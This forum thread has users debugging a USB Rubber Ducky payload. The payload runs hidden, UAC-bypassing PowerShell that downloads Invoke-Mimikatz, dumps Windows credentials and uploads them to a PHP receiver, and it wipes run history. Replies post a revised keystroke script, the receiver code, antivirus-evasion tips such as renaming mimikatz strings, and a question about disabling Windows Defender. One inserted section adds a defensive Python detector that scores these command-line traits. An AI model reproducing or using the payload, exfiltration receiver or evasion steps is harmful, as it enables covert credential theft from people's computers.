mavieprivee Posted February 12, 2017

Hello everyone. For a few days I have been trying to run my first PAYLOAD, following the purchase of the USB Rubber Ducky ... but it doesn't work ;-(

In my inject.bin file, I have this:

DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 2000
ALT y
DELAY 1000
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)"&exit
ENTER

NB: I can give the exact URL of my hosting by private message.

I transferred by FileZilla to my server both files: im.ps1 (download here: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 <-- I haven't changed it) and rx.php.

In rx.php I have this code:

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
file_put_contents($file, file_get_contents("php://input"));
?>

When I insert the USB key, the script apparently executes without error... But no file is created on my hosting ;-(

I reread the whole script ... but I do not understand why it doesn't work ;-(

Can you help me? Thanks all ;-)

NB: I'm living in FRANCE/Paris and in Normandy (Cabourg). If you go through there, I can offer you a drink ;-)
mavieprivee Posted February 12, 2017

In addition to my previous message: I just found an empty file on my server: 77.xxx.xx.xx_2017-02-12_19-59-36.creds

With no data ;-(
shr00mie Posted February 13, 2017

5 hours ago, mavieprivee said:
In addition to my previous message: I just found an empty file on my server: 77.xxx.xx.xx_2017-02-12_19-59-36.creds
With no data ;-(

1 - Your rubber ducky script is out of order. You're deleting run history and then running the script. Somewhat counterproductive, as your last command would still remain. Delete run history after running the script.

2 - Open PS as admin and run the below code in the window. See what the output says. An empty file indicates that the content of the variable is being sent from PS to the web server, but there's no content. This would lead me to believe that there's an issue either downloading or running mimikatz.

IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)
L07TB0Y Posted February 13, 2017

On 1/14/2017 at 3:08 PM, henna3 said:
I have a quick little problem. The code and everything runs perfectly fine. My problem is that when the UAC prompt comes up, it comes up as a non-active window. So, when alt+y is being pressed it's not being pressed in the UAC prompt window. Is there any way to fix this issue/workaround? Amazing twin duck payload! Thanks.

Did you find a solution? I am running into the same thing, and well, even if I choose to run the UAC I am not getting a file so
L07TB0Y Posted February 13, 2017

Well, looks like Win10 is now blocking scripts. It could be because I am running Win 10 Enterprise.

PS E:\> .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';"
.\im.ps1 : File E:\im.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module ...
+ ~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess
mavieprivee Posted February 13, 2017

6 hours ago, shr00mie said:
1 - Your rubber ducky script is out of order. You're deleting run history and then running the script. Somewhat counterproductive, as your last command would still remain. Delete run history after running the script.
2 - Open PS as admin and run the below code in the window. See what the output says. An empty file indicates that the content of the variable is being sent from PS to the web server, but there's no content. This would lead me to believe that there's an issue either downloading or running mimikatz.
IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)

Hello shr00mie,

When I run just the line

IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)

in a .ps1 file, I obtain a file on my server with this:

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */

ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

mimikatz(powershell) # exit
Bye!

;-(
Sh4d0wm4n Posted February 14, 2017

On 13/2/2017 at 3:58 AM, shr00mie said:
1 - Your rubber ducky script is out of order. You're deleting run history and then running the script. Somewhat counterproductive, as your last command would still remain. Delete run history after running the script.
2 - Open PS as admin and run the below code in the window. See what the output says. An empty file indicates that the content of the variable is being sent from PS to the web server, but there's no content. This would lead me to believe that there's an issue either downloading or running mimikatz.
IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)

His script is not out of order; it is in fact exactly the new version introduced in this very useful post from the OP. The history cleaning is performed only when the powershell process shuts down/exits. ;)

On 13/2/2017 at 6:49 AM, L07TB0Y said:
Well, looks like Win10 is now blocking scripts. It could be because I am running Win 10 Enterprise.
PS E:\> .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';"
.\im.ps1 : File E:\im.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module ...
+ ~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess

For your info, many AVs, including Windows Defender, are now able to detect the invoke-mimikatz.ps1 script.

But never trust your AV too much, as there is always an easy workaround ;) Check this post for detailed instructions: http://www.blackhillsinfosec.com/?p=5555

Basically you just need to modify the original invoke-mimikatz.ps1 script, substituting every "mimikatz" word with another one (mimidogz?).

I've also found an alternate and lighter version (400K vs 2.5Mb) of the original invoke-mimikatz script that is not detected as well, but with this one you need to type the commands interactively: no --DumpCreds switch. Here: https://gist.github.com/subTee/0a3b56ac743e8d1eeab0

I've already tested both and they work like a charm, until a future 'cheap' AV update... ;)
Sh4d0wm4n Posted February 14, 2017

I forgot to mention also that the minimum number of columns for a powershell window is now 20. No more 18, or it will not shrink.

P.S. Is there a way to edit a post after posting it?! I cannot find it.
Sh4d0wm4n Posted February 18, 2017

Hello everybody, you can get my modified invoke-mimikatz.ps1 (renamed md.ps1) from this link: https://goo.gl/FoLS0P

While this is the Duck script:

DELAY 1000
GUI r
DELAY 300
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 500
REM ALT y
LEFTARROW
DELAY 300
ENTER
DELAY 300
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://your.domain/md.ps1'); $o = Invoke-Mimidogz -DumpCred; (New-Object Net.WebClient).UploadString('https://your.domain/rx.php', $o)"&exit
ENTER

And this is the rx.php file content you need to put on your server to receive the credentials:

<?php
date_default_timezone_set('Europe/Rome');
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".txt";
file_put_contents($file, file_get_contents("php://input"));
?>
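From the defender's side, the payload posted in this thread leaves a very characteristic process-creation trail: a powershell.exe launch with -W Hidden / -Exec Bypass / -NonI, an IEX + DownloadString cradle, an UploadString call to an external host, and a cmd.exe child that shrinks the console (mode con lines=1 cols=20) and wipes the RunMRU key. The renaming trick described above (Invoke-Mimikatz becoming Invoke-Mimidogz) also shows why a detection that only greps for the word "mimikatz" is brittle. The following Python is an added example, not code from this thread or from any project mentioned in it: it scores constructed process-creation records against those traits, giving the tool-name match deliberately low weight. The sample records, the indicator weights and the alert threshold are all assumptions chosen for the example.

```python
import re

# Constructed process-creation records in the shape a 4688 / Sysmon-style
# collector would produce (image path + command line). They are made up for
# this example and are not real log extracts. Records 1 and 2 mirror the
# payload in the thread; records 3 and 4 are benign admin usage.
SAMPLE_EVENTS = [
    {"id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('https://your.domain/md.ps1'); $o = Invoke-Mimidogz -DumpCred; "
            "(New-Object Net.WebClient).UploadString('https://your.domain/rx.php', $o)\""},
    {"id": 2,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd /t:fe /k mode con lines=1 cols=20&reg delete "
            r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f"},
    {"id": 3,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\Backup.ps1"},
    {"id": 4,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell Get-ChildItem C:\Temp"},
]

# (name, pattern, weight). Weights are assumptions for the example. The
# download cradle and the HTTP exfil call carry the most weight because they
# survive renaming of the tool; "tool_name" is kept at weight 1 only so the
# record shows that a Mimidogz-style rename does not hit it at all.
INDICATORS = [
    ("hidden_window",   re.compile(r"-W(indowStyle)?\s+Hidden", re.I), 2),
    ("exec_bypass",     re.compile(r"-Exec(utionPolicy)?\s+Bypass", re.I), 1),
    ("noninteractive",  re.compile(r"-NonI(nteractive)?\b", re.I), 1),
    ("download_cradle", re.compile(r"(IEX|Invoke-Expression)\b.*DownloadString\(", re.I), 4),
    ("http_exfil",      re.compile(r"UploadString\(", re.I), 3),
    ("runmru_wipe",     re.compile(r"reg\s+delete\s+.*\\Explorer\\RunMRU", re.I), 3),
    ("console_shrink",  re.compile(r"mode\s+con\s+lines=\d+\s+cols=\d+", re.I), 2),
    ("tool_name",       re.compile(r"mimikatz", re.I), 1),
]

# Assumed alert threshold: a lone -ExecutionPolicy Bypass (common in scheduled
# admin scripts) must stay below it, the cradle alone must not.
THRESHOLD = 5


def score_event(cmd: str) -> tuple[int, list[str]]:
    """Return (total weight, names of matched indicators) for one command line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmd)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def analyse(events, threshold: int = THRESHOLD) -> list[dict]:
    """Score every record and return those at or above the threshold."""
    alerts = []
    for ev in events:
        score, hits = score_event(ev["cmd"])
        if score >= threshold:
            alerts.append({"id": ev["id"], "image": ev["image"],
                           "score": score, "hits": hits})
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_EVENTS):
        print(f"ALERT record {alert['id']} score={alert['score']} "
              f"hits={','.join(alert['hits'])}")
```

Record 1 scores on the window, policy, cradle and exfil traits without ever matching "mimikatz", and record 2 scores on the console-shrink plus RunMRU deletion pair, which is worth correlating with the parent powershell.exe launch since on its own it is also the anti-forensics step. Record 3 stays below the threshold, which is the point of scoring rather than alerting on any single flag.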
Epoc Posted March 16, 2017

Hello Sh4d0wm4n,

Your script is great, thank you! But, unfortunately, the link with your modified invoke-mimikatz.ps1 (renamed md.ps1) isn't available anymore... Could you, please, reupload it again?

Thanks a lot!
shr00mie Posted March 17, 2017

This is what you're looking for: https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz
MS08067 Posted April 4, 2017

I am getting the following error. The web server does create the file, however the contents are blank. Here is what is found when running the command... anyone else run into this?

C:\WINDOWS\system32>powershell "IEX (New-Object Net.WebClient).DownloadString('http://XXXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://XXXXXXXXX/rx.php',$output)"
New-Object : Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:85
+ ... dString('http://XXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCr ...
+                                                ~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

C:\WINDOWS\system32>
MS08067 Posted April 4, 2017

1 hour ago, MS08067 said:
I am getting the following error. The web server does create the file, however the contents are blank. Here is what is found when running the command... anyone else run into this?
C:\WINDOWS\system32>powershell "IEX (New-Object Net.WebClient).DownloadString('http://XXXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://XXXXXXXXX/rx.php',$output)"
New-Object : Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:85
+ ... dString('http://XXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCr ...
+                                                ~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
C:\WINDOWS\system32>

I figured out what's going on here. Windows Defender was catching it and removing it before it was able to be run. Once I disabled it, it then worked just fine.

Now the question is, should we automate turning Windows Defender off as a service (since we are administrator) or do we try and obfuscate the file so it's not detected?
joe4729 Posted October 31, 2022

Is this the payload where she plugs it in to a screen-off computer and waits a few seconds and pulls it out and then has the login and password?